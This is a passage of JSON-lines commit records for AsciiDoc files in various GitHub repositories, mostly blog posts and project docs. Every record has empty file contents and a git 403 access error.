page\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/troubleshooting\/validation_problems.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/troubleshooting\/validation_problems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blindpirate\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1edcb5ac661d64fcd540419a30d507ab70849175","subject":"Update 2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","message":"Update 2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","new_file":"_posts\/2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ad8078804b7d7b8429aa9f72f843656ff5042c6","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f682df3e9aecf0774a148af3b9162af1ca36a62","subject":"Update alert-notifiers-for-mobile-devices.adoc","message":"Update alert-notifiers-for-mobile-devices.adoc","repos":"ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73c701bbd7e0490f368161d9a70d5dfab322f2cb","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f96e7a43c775bdb5d873be5b1a63bf803428d17a","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jpa\/uuid-demo\/readme.adoc","new_file":"jpa\/uuid-demo\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932ca89fb600ca4096b4b58306312790f4f2f504","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f3941074c8845ca0625fba4adf0e8f95c43de91","subject":"Add error handling docs","message":"Add error handling docs\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/pages\/core\/error-handling.adoc","new_file":"docs-src\/modules\/ROOT\/pages\/core\/error-handling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wilkerlucio\/pathom.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57ff6816ba9f8657bd4983435caf512f32b18ed1","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa9eaa2ae2d58a4eb184ad2479cf48da056033b0","subject":"Update 2016-03-10-My-first-article.adoc","message":"Update 2016-03-10-My-first-article.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2016-03-10-My-first-article.adoc","new_file":"_posts\/2016-03-10-My-first-article.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c456a0ff1c9bcd0743ffbfb6c75356e7b7ff2a5","subject":"Publish 2016-6-29-PHPER-RBAC.adoc","message":"Publish 2016-6-29-PHPER-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-29-PHPER-RBAC.adoc","new_file":"2016-6-29-PHPER-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f4a588af12c2a905de560f6d4676990123e9d9f","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dfdd7d247ac6ef6cca0d5b9fea200149bfbb67f","subject":"Update 2015-07-31-HitachiId.adoc","message":"Update 2015-07-31-HitachiId.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-07-31-HitachiId.adoc","new_file":"_posts\/2015-07-31-HitachiId.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca531b9bdde68b1fe869ee7c2882e81eb898480f","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bd0b6debc7f67a5ea227db72346d6b126cdde4b","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"470fab430d91bd14204cd8a1f2f1483cb2076702","subject":"Update 2017-12-23-Good-Luck.adoc","message":"Update 2017-12-23-Good-Luck.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-23-Good-Luck.adoc","new_file":"_posts\/2017-12-23-Good-Luck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c598c08916cf229d1d1a53265558fc6beb24aa2","subject":"y2b create post Star Wars X Adidas Originals - Death Star Conductor Hi - Unboxing \\u0026 Overview","message":"y2b create post Star Wars X Adidas Originals - Death Star Conductor Hi - Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-11-Star-Wars-X-Adidas-Originals--Death-Star-Conductor-Hi--Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-11-Star-Wars-X-Adidas-Originals--Death-Star-Conductor-Hi--Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"041a5518c45bb302952e4b380d3c9c8cd858ee6d","subject":"Update 2015-07-01-Hybirs-Define-local-Config-for-specific-environment.adoc","message":"Update 2015-07-01-Hybirs-Define-local-Config-for-specific-environment.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-01-Hybirs-Define-local-Config-for-specific-environment.adoc","new_file":"_posts\/2015-07-01-Hybirs-Define-local-Config-for-specific-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9194859a5e74637e1ef7e61382840bca4d4daaa6","subject":"Typo URL conf","message":"Typo URL conf\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Graded exercices.adoc","new_file":"Git\/Graded exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fe263b38d6357157154c50e804a8d929af57aa8","subject":"Update 2015-12-18-Hello-World-21.adoc","message":"Update 2015-12-18-Hello-World-21.adoc","repos":"jaslyn94\/jaslyn94.github.io,jaslyn94\/jaslyn94.github.io,jaslyn94\/jaslyn94.github.io","old_file":"_posts\/2015-12-18-Hello-World-21.adoc","new_file":"_posts\/2015-12-18-Hello-World-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaslyn94\/jaslyn94.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7313d643d5322225b8e05144e4c3311869d91cd2","subject":"Update 2018-02-03-NSUCRYPTO-2017.adoc","message":"Update 2018-02-03-NSUCRYPTO-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2018-02-03-NSUCRYPTO-2017.adoc","new_file":"_posts\/2018-02-03-NSUCRYPTO-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f100c6c2a78bc40d914f3e2c0e6912b3bf3191c","subject":"y2b create post Moto X Unboxing (Find Out Why It's One Of My Favorites!)","message":"y2b create post Moto X Unboxing (Find Out Why It's One Of My Favorites!)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-27-Moto-X-Unboxing-Find-Out-Why-Its-One-Of-My-Favorites.adoc","new_file":"_posts\/2013-09-27-Moto-X-Unboxing-Find-Out-Why-Its-One-Of-My-Favorites.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"220519625f953126b4fdfdc23cbf6afb419940fe","subject":"y2b create post The DIY Jacket Upgrade, Thank Me Later","message":"y2b create post The DIY Jacket Upgrade, Thank Me Later","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-07-The%20DIY%20Jacket%20Upgrade%2C%20Thank%20Me%20Later.adoc","new_file":"_posts\/2018-01-07-The%20DIY%20Jacket%20Upgrade%2C%20Thank%20Me%20Later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ece9df55eca1fad0878ecf48a916c06a2afd6e5b","subject":"CAMEL-17117: preliminary documentation for the resume strategy","message":"CAMEL-17117: preliminary documentation for the resume strategy\n","repos":"adessaigne\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,christophd\/camel,cunningt\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,apache\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel","old_file":"core\/camel-core-engine\/src\/main\/docs\/modules\/eips\/pages\/resume-strategies.adoc","new_file":"core\/camel-core-engine\/src\/main\/docs\/modules\/eips\/pages\/resume-strategies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44e28ae38a4995bd8ea8f9fb8d8cb4562e93349f","subject":"y2b create post PS4 Problems (DualShock 4 Controller)","message":"y2b create post PS4 Problems (DualShock 4 Controller)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-17-PS4-Problems-DualShock-4-Controller.adoc","new_file":"_posts\/2014-01-17-PS4-Problems-DualShock-4-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2af74283ed37dfcd8ffdbfe6a7b22aca25b544fc","subject":"Update 2016-11-16-Living-documentation-a-maven-plugin.adoc","message":"Update 2016-11-16-Living-documentation-a-maven-plugin.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2016-11-16-Living-documentation-a-maven-plugin.adoc","new_file":"_posts\/2016-11-16-Living-documentation-a-maven-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ec658053812850df5512bfd28d579133c5580e2","subject":"Renamed '_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc' to '_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-TOTP.adoc'","message":"Renamed '_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc' to '_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-TOTP.adoc'","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-TOTP.adoc","new_file":"_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-TOTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51162ab743e19160b0cc57f901a2842265d6b185","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea25dc44d8bfd65bcf7cfdec605793b3b16e45f3","subject":"y2b create post $700 Audeze Headphones","message":"y2b create post $700 Audeze Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-28-700-Audeze-Headphones.adoc","new_file":"_posts\/2015-03-28-700-Audeze-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5c02a371cf4d802f582841bdf05b4b9aade13d9","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6823b23fbb1b55367d84fe1c5b57ba3ed385a744","subject":"Update 2019-01-31-PlaidCTF-2017-Writeup.adoc","message":"Update 2019-01-31-PlaidCTF-2017-Writeup.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc","new_file":"_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5831d4627d20d8dabf46b3b6685440046aa55128","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e6824d675e308d0626743c22302862ee618a915","subject":"Update 2015-10-11-Maven-in-5-Minutes.adoc","message":"Update 2015-10-11-Maven-in-5-Minutes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3d58445f268b4f37ae82004b46ea1893bd997c9","subject":"Explain the use of 'Cgreen' as the SUT in the first examples","message":"Explain the use of 'Cgreen' as the SUT in the first examples\n","repos":"thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"254c1e2606daf11d42c04b9c3e2c354706af97c5","subject":"mrp comments","message":"mrp comments\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"828e3f1da7fb300a92074e261a0ccd7c83c79c0f","subject":"Updated README","message":"Updated README\n","repos":"adi9090\/javaanpr,joshuagn\/ANPR,justhackit\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"283eb43c92de9be54e1a6691d1da4beadb532719","subject":"Convert readme to adoc","message":"Convert readme to adoc\n","repos":"Sberned\/spring-flow-statemachine","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sberned\/spring-flow-statemachine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526539e93f7a105c60cf7f8e42ff3f7447a5eef3","subject":"README.adoc: fix literal not supported by GH","message":"README.adoc: fix literal not supported by GH\n\nSigned-off-by: Philippe Proulx <2096628897b40c93960fdd9e24c9c883a54d4fe9@gmail.com>\n","repos":"alexmonthy\/lttng-scope,lttng\/lttng-scope,lttng\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lttng\/lttng-scope.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"05bd5a9756ddd10b61cf91c617902472fe6a7a04","subject":"Create README.adoc","message":"Create README.adoc","repos":"spring-cloud-samples\/github-analytics,marcingrzejszczak\/github-analytics-demo,marcingrzejszczak\/github-analytics-gradle,marcingrzejszczak\/github-analytics-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcingrzejszczak\/github-analytics-gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b552580d106fedd85808736bd2c6e642104afc5","subject":"Update 2016-07-24-Gerador-de-senhas-aleatorias-Linux.adoc","message":"Update 2016-07-24-Gerador-de-senhas-aleatorias-Linux.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Gerador-de-senhas-aleatorias-Linux.adoc","new_file":"_posts\/2016-07-24-Gerador-de-senhas-aleatorias-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dd0ea386570c5e51a8977508c38151fa20642c7","subject":"y2b create post How To Roll Off Nasty Fingerprints!","message":"y2b create post How To Roll Off Nasty Fingerprints!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-07-How-To-Roll-Off-Nasty-Fingerprints.adoc","new_file":"_posts\/2016-08-07-How-To-Roll-Off-Nasty-Fingerprints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f651f8df34182ebe4cd9dfd6efb6dddb604061e8","subject":"Remove redundant info","message":"Remove redundant info\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e690f62914e5f01b794134be985861379854fda2","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"712dfbf417fcd15ffd7ad6a10ce10b740807da4f","subject":"Update manifest.yml","message":"Update 